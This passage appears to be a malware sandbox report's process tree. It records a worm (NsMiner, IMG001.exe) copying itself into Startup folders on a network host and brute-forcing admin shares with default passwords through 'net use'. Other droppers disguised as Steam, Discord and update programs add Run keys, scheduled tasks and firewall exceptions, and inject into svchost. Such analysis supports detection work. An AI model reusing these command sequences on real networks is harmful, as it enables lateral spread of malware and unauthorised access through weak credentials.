        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6520
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5812
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6392
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6232
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6916
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7080
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7472
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7812
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:7276
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6148
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:6696
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6528
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6648
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5440
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2768
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5172
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "
        6⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"
        7⤵
        
        PID:6164
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:5208
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6756
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5376
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7716
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3420
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6064
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5260
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6480
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5804
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4900
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6556
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5916
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7484
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6956
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4424
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7392
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5896
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4416
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:4852
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5252
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:7140
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1232
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6524
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5468
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7888
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4092
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2712
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "
        6⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"
        7⤵
        
        PID:8184
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:5596
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5144
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6432
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"1"
        6⤵
        
        PID:4424
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"1"
        6⤵
        
        PID:7876
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7956
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"1"
        6⤵
        
        PID:6976
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"1"
        6⤵
        
        PID:7056
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7812
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"1"
        6⤵
        
        PID:5264
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"1"
        6⤵
        
        PID:1460
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4100
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1503" /user:"1"
        6⤵
        
        PID:6276
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1503" /user:"1"
        6⤵
        
        PID:6780
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6344
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"1"
        6⤵
        
        PID:6232
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"1"
        6⤵
        
        PID:8116
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1720
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"10.127.0.1"
        6⤵
        
        PID:5272
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"10.127.0.1"
        6⤵
        
        PID:5304
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7800
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"10.127.0.1"
        6⤵
        
        PID:5216
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"10.127.0.1"
        6⤵
        
        PID:5860
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6556
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"10.127.0.1"
        6⤵
        
        PID:1004
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"10.127.0.1"
        6⤵
        
        PID:6196
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6956
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"
        6⤵
        
        PID:7660
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"
        6⤵
        
        PID:6720
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7444
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1503" /user:"10.127.0.1"
        6⤵
        
        PID:1108
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1503" /user:"10.127.0.1"
        6⤵
        
        PID:4112
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1292
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"10.127.0.1"
        6⤵
        
        PID:5412
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"10.127.0.1"
        6⤵
        
        PID:1132
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3264
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"administrator"
        6⤵
        
        PID:7520
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"administrator"
        6⤵
        
        PID:7752
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7628
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"administrator"
        6⤵
        
        PID:2316
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"administrator"
        6⤵
        
        PID:2064
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7768
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"administrator"
        6⤵
        
        PID:6976
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"administrator"
        6⤵
        
        PID:7916
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8336
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "administrator" /user:"administrator"
        6⤵
        
        PID:4968
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "administrator" /user:"administrator"
        6⤵
        
        PID:6184
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6752
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1503" /user:"administrator"
        6⤵
        
        PID:5344
- - C:\Users\Admin\AppData\Local\Temp\a\z.exe
    "C:\Users\Admin\AppData\Local\Temp\a\z.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3180
- - C:\Users\Admin\AppData\Local\Temp\a\steam.exe
    "C:\Users\Admin\AppData\Local\Temp\a\steam.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Users\Public\Discord.exe
      "C:\Users\Public\Discord.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1856
  - - C:\Users\Public\Steam.exe
      "C:\Users\Public\Steam.exe"
      4⤵
      Executes dropped EXE
      PID:4280
- - C:\Users\Admin\AppData\Local\Temp\a\bitcoin3000.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bitcoin3000.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:6076
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c appbitcoin.bat
      4⤵
      PID:6104
- - C:\Users\Admin\AppData\Local\Temp\a\savedecrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\a\savedecrypter.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:5164
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "TCP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpBE69.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5920
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "TCP Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpBEB8.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5972
- - C:\Users\Admin\AppData\Local\Temp\a\Update.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:5584
  - - C:\Users\Admin\AppData\Roaming\Update.exe
      "C:\Users\Admin\AppData\Roaming\Update.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:1056
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Update.exe" "Update.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3172
- - C:\Users\Admin\AppData\Local\Temp\a\cann.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cann.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SendNotifyMessage
    PID:5308
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cann.exe"
      4⤵
      PID:5368
- - C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4976
  - - C:\Windows\WindowsServices.exe
      "C:\Windows\WindowsServices.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4128
- - C:\Users\Admin\AppData\Local\Temp\a\bin2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bin2.exe"
    3⤵
